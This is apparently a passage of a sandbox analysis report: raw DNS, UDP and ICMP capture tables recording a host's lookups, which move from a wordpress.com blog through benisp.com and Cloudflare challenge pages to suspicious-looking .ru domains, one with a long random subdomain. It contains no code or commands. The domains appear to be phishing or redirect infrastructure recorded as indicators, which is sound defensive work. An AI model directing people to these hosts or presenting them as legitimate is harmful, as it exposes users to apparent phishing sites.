                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.573376894 CET53543591.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.619760036 CET53498701.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.696898937 CET53590991.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.846966028 CET5553453192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.847352028 CET6100353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.987945080 CET53555341.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.988074064 CET53610031.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.132675886 CET5717453192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.132823944 CET6466253192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.272335052 CET53646621.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.272653103 CET53571741.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.283063889 CET5571453192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.283209085 CET5946653192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.360716105 CET6052953192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.360872984 CET5944453192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.422599077 CET53557141.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.424000978 CET53594661.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.499293089 CET53605291.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.499979973 CET53594441.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.838164091 CET5354453192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.838325024 CET6367653192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.915440083 CET6269353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.915606976 CET5784053192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.975392103 CET53535441.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.976113081 CET53636761.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.976279974 CET53573541.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:36.053771973 CET53626931.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:36.055067062 CET53578401.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:37.637329102 CET5352553192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:37.637487888 CET5017653192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:37.774525881 CET53535251.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:37.774776936 CET53501761.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:42.512726068 CET53501991.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:43.721290112 CET5800353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:43.721503019 CET5596353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:44.295144081 CET53580031.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:44.295969009 CET53559631.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:47.215346098 CET53540241.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:55.726138115 CET5837453192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:55.726346016 CET5846353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:56.172630072 CET53583741.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:56.173108101 CET53584631.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.778629065 CET5445953192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.778763056 CET4968853192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.782332897 CET5649753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.782490969 CET6459753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.782931089 CET6275153192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.783066034 CET5534753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.916667938 CET53496881.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.917157888 CET53544591.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.919290066 CET53564971.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.919385910 CET53645971.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.919881105 CET53627511.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.920015097 CET53553471.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.744510889 CET53496661.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.118226051 CET5782153192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.118350983 CET5908153192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.257180929 CET53590811.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.259296894 CET53578211.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.334075928 CET6065853192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.334320068 CET6304553192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.472814083 CET53606581.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.479168892 CET53630451.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.806581974 CET5834853192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.806751966 CET4924253192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.840351105 CET5745253192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.840504885 CET6164653192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.944730997 CET53492421.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.955369949 CET53583481.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.978485107 CET53574521.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.979029894 CET53616461.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.968847036 CET5570753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.969399929 CET5687853192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.106415987 CET53557071.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.109462976 CET53568781.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.437361002 CET138138192.168.2.11192.168.2.255
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:22.578809977 CET53587031.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:23.979614019 CET53599481.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.730545998 CET6247953192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.730663061 CET5528453192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.162336111 CET53624791.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.162375927 CET53552841.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.634051085 CET5903053192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.634195089 CET6153353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.771859884 CET53615331.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.772279024 CET53590301.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.853741884 CET53601801.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.859400988 CET53547531.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.999766111 CET53621281.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:29.036657095 CET5648553192.168.2.118.8.8.8
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:29.036904097 CET6117853192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:29.170377016 CET53564858.8.8.8192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:29.174115896 CET53611781.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.189466000 CET53588691.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.189485073 CET53497511.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:35.488526106 CET53615311.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:35.488590956 CET53576461.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:35.628371954 CET53582541.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:42.103626013 CET53603831.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:42.104316950 CET53552761.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:42.246279001 CET53500731.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:42.261464119 CET6003953192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:42.261795998 CET6226253192.168.2.118.8.8.8
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:42.399358034 CET53622628.8.8.8192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:42.400420904 CET53600391.1.1.1192.168.2.11
                                                                                                                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.463181019 CET192.168.2.111.1.1.1c224(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.696985960 CET192.168.2.111.1.1.1c227(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.655411959 CET192.168.2.111.1.1.10x7c21Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.655524969 CET192.168.2.111.1.1.10xda71Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.081235886 CET192.168.2.111.1.1.10xdf08Standard query (0)dnearymedahealthstaffing.wordpress.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.081484079 CET192.168.2.111.1.1.10xda94Standard query (0)dnearymedahealthstaffing.wordpress.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.237373114 CET192.168.2.111.1.1.10x7068Standard query (0)s1.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.237608910 CET192.168.2.111.1.1.10xc5c7Standard query (0)s1.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.238089085 CET192.168.2.111.1.1.10xbe0cStandard query (0)s2.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.238202095 CET192.168.2.111.1.1.10x4dcdStandard query (0)s2.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.238883018 CET192.168.2.111.1.1.10x5ef6Standard query (0)s0.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.239011049 CET192.168.2.111.1.1.10xc607Standard query (0)s0.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.381138086 CET192.168.2.111.1.1.10x7acfStandard query (0)wordpress.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.381449938 CET192.168.2.111.1.1.10x373fStandard query (0)wordpress.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.241132975 CET192.168.2.111.1.1.10xa408Standard query (0)0.gravatar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.241616011 CET192.168.2.111.1.1.10xccfbStandard query (0)0.gravatar.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.243916988 CET192.168.2.111.1.1.10x4db9Standard query (0)s1.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.244051933 CET192.168.2.111.1.1.10x3f4aStandard query (0)s1.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.433213949 CET192.168.2.111.1.1.10x7c7fStandard query (0)stats.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.433414936 CET192.168.2.111.1.1.10x3d62Standard query (0)stats.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.479458094 CET192.168.2.111.1.1.10xb1efStandard query (0)fonts.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.479618073 CET192.168.2.111.1.1.10x1ca5Standard query (0)fonts.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.846966028 CET192.168.2.111.1.1.10xb2d2Standard query (0)dnearymedahealthstaffing.wordpress.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.847352028 CET192.168.2.111.1.1.10x774Standard query (0)dnearymedahealthstaffing.wordpress.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.132675886 CET192.168.2.111.1.1.10xdfebStandard query (0)s2.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.132823944 CET192.168.2.111.1.1.10x1693Standard query (0)s2.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.283063889 CET192.168.2.111.1.1.10xdfe9Standard query (0)stats.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.283209085 CET192.168.2.111.1.1.10xa827Standard query (0)stats.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.360716105 CET192.168.2.111.1.1.10x187bStandard query (0)0.gravatar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.360872984 CET192.168.2.111.1.1.10x1f70Standard query (0)0.gravatar.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.838164091 CET192.168.2.111.1.1.10xff66Standard query (0)pixel.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.838325024 CET192.168.2.111.1.1.10xf379Standard query (0)pixel.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.915440083 CET192.168.2.111.1.1.10xa02Standard query (0)s0.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.915606976 CET192.168.2.111.1.1.10x580bStandard query (0)s0.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:37.637329102 CET192.168.2.111.1.1.10xf381Standard query (0)pixel.wp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:37.637487888 CET192.168.2.111.1.1.10x52bbStandard query (0)pixel.wp.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:43.721290112 CET192.168.2.111.1.1.10x4ff6Standard query (0)benisp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:43.721503019 CET192.168.2.111.1.1.10x2b11Standard query (0)benisp.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:55.726138115 CET192.168.2.111.1.1.10xf103Standard query (0)oksu.ertanduzu.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:55.726346016 CET192.168.2.111.1.1.10x6d73Standard query (0)oksu.ertanduzu.ru65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.778629065 CET192.168.2.111.1.1.10xbe41Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.778763056 CET192.168.2.111.1.1.10x5e46Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.782332897 CET192.168.2.111.1.1.10xbe2aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.782490969 CET192.168.2.111.1.1.10xd0daStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.782931089 CET192.168.2.111.1.1.10xe304Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.783066034 CET192.168.2.111.1.1.10xa5b6Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.118226051 CET192.168.2.111.1.1.10xd69eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.118350983 CET192.168.2.111.1.1.10x8962Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.334075928 CET192.168.2.111.1.1.10xaf7Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.334320068 CET192.168.2.111.1.1.10xcc15Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.806581974 CET192.168.2.111.1.1.10xa3b0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.806751966 CET192.168.2.111.1.1.10x3ca0Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.840351105 CET192.168.2.111.1.1.10xa852Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.840504885 CET192.168.2.111.1.1.10x84d4Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.968847036 CET192.168.2.111.1.1.10xd661Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.969399929 CET192.168.2.111.1.1.10x8844Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.730545998 CET192.168.2.111.1.1.10xd3cStandard query (0)gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.730663061 CET192.168.2.111.1.1.10x6c13Standard query (0)gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.634051085 CET192.168.2.111.1.1.10x852Standard query (0)gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.634195089 CET192.168.2.111.1.1.10x6335Standard query (0)gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:29.036657095 CET192.168.2.118.8.8.80x11a4Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:29.036904097 CET192.168.2.111.1.1.10x37f0Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:42.261464119 CET192.168.2.111.1.1.10xd2fdStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:42.261795998 CET192.168.2.118.8.8.80x69d8Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.792143106 CET1.1.1.1192.168.2.110x7c21No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.792445898 CET1.1.1.1192.168.2.110xda71No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.374011993 CET1.1.1.1192.168.2.110xda94No error (0)dnearymedahealthstaffing.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.386212111 CET1.1.1.1192.168.2.110xdf08No error (0)dnearymedahealthstaffing.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.386212111 CET1.1.1.1192.168.2.110xdf08No error (0)lb.wordpress.com192.0.78.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.386212111 CET1.1.1.1192.168.2.110xdf08No error (0)lb.wordpress.com192.0.78.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.375247002 CET1.1.1.1192.168.2.110x7068No error (0)s1.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.375700951 CET1.1.1.1192.168.2.110x5ef6No error (0)s0.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.376070976 CET1.1.1.1192.168.2.110xbe0cNo error (0)s2.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.518398046 CET1.1.1.1192.168.2.110x7acfNo error (0)wordpress.com192.0.78.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.518398046 CET1.1.1.1192.168.2.110x7acfNo error (0)wordpress.com192.0.78.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.382077932 CET1.1.1.1192.168.2.110x4db9No error (0)s1.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.455950022 CET1.1.1.1192.168.2.110xa408No error (0)0.gravatar.com192.0.73.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.573241949 CET1.1.1.1192.168.2.110x7c7fNo error (0)stats.wp.com192.0.76.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.619760036 CET1.1.1.1192.168.2.110xb1efNo error (0)fonts.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.987945080 CET1.1.1.1192.168.2.110xb2d2No error (0)dnearymedahealthstaffing.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.987945080 CET1.1.1.1192.168.2.110xb2d2No error (0)lb.wordpress.com192.0.78.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.987945080 CET1.1.1.1192.168.2.110xb2d2No error (0)lb.wordpress.com192.0.78.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.988074064 CET1.1.1.1192.168.2.110x774No error (0)dnearymedahealthstaffing.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.272653103 CET1.1.1.1192.168.2.110xdfebNo error (0)s2.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.422599077 CET1.1.1.1192.168.2.110xdfe9No error (0)stats.wp.com192.0.76.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.499293089 CET1.1.1.1192.168.2.110x187bNo error (0)0.gravatar.com192.0.73.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.975392103 CET1.1.1.1192.168.2.110xff66No error (0)pixel.wp.com192.0.76.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:36.053771973 CET1.1.1.1192.168.2.110xa02No error (0)s0.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:37.774525881 CET1.1.1.1192.168.2.110xf381No error (0)pixel.wp.com192.0.76.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:44.295144081 CET1.1.1.1192.168.2.110x4ff6No error (0)benisp.com192.185.195.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:56.172630072 CET1.1.1.1192.168.2.110xf103No error (0)oksu.ertanduzu.ru172.67.134.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:56.172630072 CET1.1.1.1192.168.2.110xf103No error (0)oksu.ertanduzu.ru104.21.6.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:56.173108101 CET1.1.1.1192.168.2.110x6d73No error (0)oksu.ertanduzu.ru65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.917157888 CET1.1.1.1192.168.2.110xbe41No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.917157888 CET1.1.1.1192.168.2.110xbe41No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.917157888 CET1.1.1.1192.168.2.110xbe41No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.917157888 CET1.1.1.1192.168.2.110xbe41No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.919290066 CET1.1.1.1192.168.2.110xbe2aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.919290066 CET1.1.1.1192.168.2.110xbe2aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.919385910 CET1.1.1.1192.168.2.110xd0daNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.919881105 CET1.1.1.1192.168.2.110xe304No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.919881105 CET1.1.1.1192.168.2.110xe304No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.920015097 CET1.1.1.1192.168.2.110xa5b6No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.257180929 CET1.1.1.1192.168.2.110x8962No error (0)cdnjs.cloudflare.com65IN (0x0001)false
